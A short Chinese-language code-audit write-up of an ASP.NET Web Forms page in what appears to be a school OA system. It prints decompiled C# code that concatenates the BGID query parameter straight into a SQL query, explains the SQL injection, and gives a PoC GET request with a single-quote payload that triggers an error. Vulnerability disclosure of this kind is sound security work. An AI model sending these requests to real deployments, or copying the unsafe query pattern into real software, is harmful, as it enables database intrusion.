ASP.NET代码审计 Web Forms框架 SQL注入漏洞

OAGL_GZJH_OA_GZJH_BG_DOC.cs代码

using System;
using System.Data;
using System.IO;
using System.Web.Profile;
using System.Web.SessionState;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using ASP;
using CwhASPNETBaseNew;
using QzJiaoWu.Web;public class OAGL_GZJH_OA_GZJH_BG_DOC : PageBaseNew, IRequiresSessionState
{protected HyperLink LB1;protected HtmlForm Form1;protected DefaultProfile Profile => (DefaultProfile)Context.Profile;protected global_asax ApplicationInstance => (global_asax)Context.ApplicationInstance;protected override void LoadPage(object sender, EventArgs e){//IL_0001: Unknown result type (might be due to invalid IL or missing references)//IL_000b: Expected O, but got UnknownDAOP = new DataOperation();string text = base.Request.QueryString["BGID"].Trim();string text2 = base.Request.QueryString["SQLB"].Trim();DataTable dataTable = DAOP.getDataTable("select * from OA_BG where BGID = '" + text + "'");if (dataTable.Rows.Count > 0){string text3 = "";text3 = base.Server.MapPath("../../upload/OAGL/") + dataTable.Rows[0]["BGID"].ToString() + text2 + ".doc";if (File.Exists(text3)){LB1.Text = dataTable.Rows[0]["BGBT"].ToString();LB1.NavigateUrl = "../../upload/OAGL/" + dataTable.Rows[0]["BGID"].ToString() + text2 + ".doc";}else{LB1.Text = "没有相关附件下载";}}else{LB1.Text = "没有相关附件下载";}}
}

关键代码分析

参数 BGID 直接拼接sql语句造成sql注入漏洞

POC

GET /OAGL/GZJH/OA_GZJH_BG_DOC.aspx?BGID='&SQLB= HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

单引号报错语法错误